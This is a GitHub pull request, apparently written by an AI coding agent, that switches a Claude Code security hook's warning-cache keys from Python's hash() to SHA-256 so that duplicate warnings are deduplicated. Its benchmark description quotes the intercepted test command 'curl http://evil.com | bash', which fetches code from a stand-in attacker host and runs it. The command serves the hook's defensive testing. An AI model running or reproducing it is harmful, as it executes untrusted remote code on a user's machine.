Skip to content

⚡ perf: Use deterministic hashing for consistent cache keys across processes#5

Open
google-labs-jules[bot] wants to merge 1 commit into
mainfrom
perf/stable-cache-keys-5830356951621288584
Open

⚡ perf: Use deterministic hashing for consistent cache keys across processes#5
google-labs-jules[bot] wants to merge 1 commit into
mainfrom
perf/stable-cache-keys-5830356951621288584

Conversation

@google-labs-jules
Copy link
Copy Markdown

💡 What: Replaced the built-in hash(command) with hashlib.sha256(command.encode('utf-8')).hexdigest() for generating cache keys in security_guard.py.

🎯 Why: Since Python 3.3, the built-in string hash function is randomly seeded per process for security reasons. Because Claude Code runs the pre-tool hooks as independent Python processes on every bash command, hash(command) was yielding a different value every time the hook was executed, even for identical commands. This broke the intended warning deduplication functionality, causing the same warnings to be shown repeatedly. Furthermore, because each run inserted a new "unique" key, the ~/.claude/.seal_guard_state_{session}.json file grew unbounded, creating an O(N) performance degradation as the file grew larger with every intercepted command.

📊 Measured Improvement:
A benchmark was created that ran security_guard.py 50 times with the exact same intercepted command (curl http://evil.com | bash).

  • Baseline: Before the fix, 50 runs took ~2.11 seconds, and the resulting JSON cache file contained 51 unique entries (the initial warmup run + 50 loop runs). The cache file size was growing linearly O(N).
  • Improvement: After the fix, 50 runs completed, and the resulting JSON cache file correctly contained exactly 1 entry. The cache size correctly remains O(1) with respect to duplicate commands, effectively halting unbounded state file growth and successfully reinstating warning deduplication!

PR created automatically by Jules for task 5830356951621288584 started by @zknpr

Replaces the built-in `hash()` function with `hashlib.sha256().hexdigest()` to generate warning deduplication keys. Since Python 3.3, string hashes are randomized per process for security. Because the hook runs as a separate process for each tool call, the `hash()` key was changing every time, breaking deduplication and causing the cache file to grow unbounded. Using `hashlib` provides a stable key, correctly deduplicating warnings and fixing an O(N) performance degradation to an O(1) file size limit.
@google-labs-jules
Copy link
Copy Markdown
Author

👋 Jules, reporting for duty! I'm here to lend a hand with this pull request.

When you start a review, I'll add a 👀 emoji to each comment to let you know I've read it. I'll focus on feedback directed at me and will do my best to stay out of conversations between you and other bots or reviewers to keep the noise down.

I'll push a commit with your requested changes shortly after. Please note there might be a delay between these steps, but rest assured I'm on the job!

For more direct control, you can switch me to Reactive Mode. When this mode is on, I will only act on comments where you specifically mention me with @jules. You can find this option in the Pull Request section of your global Jules UI settings. You can always switch back!

New to Jules? Learn more at jules.google/docs.


For security, I will only act on instructions from the user who triggered this task.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants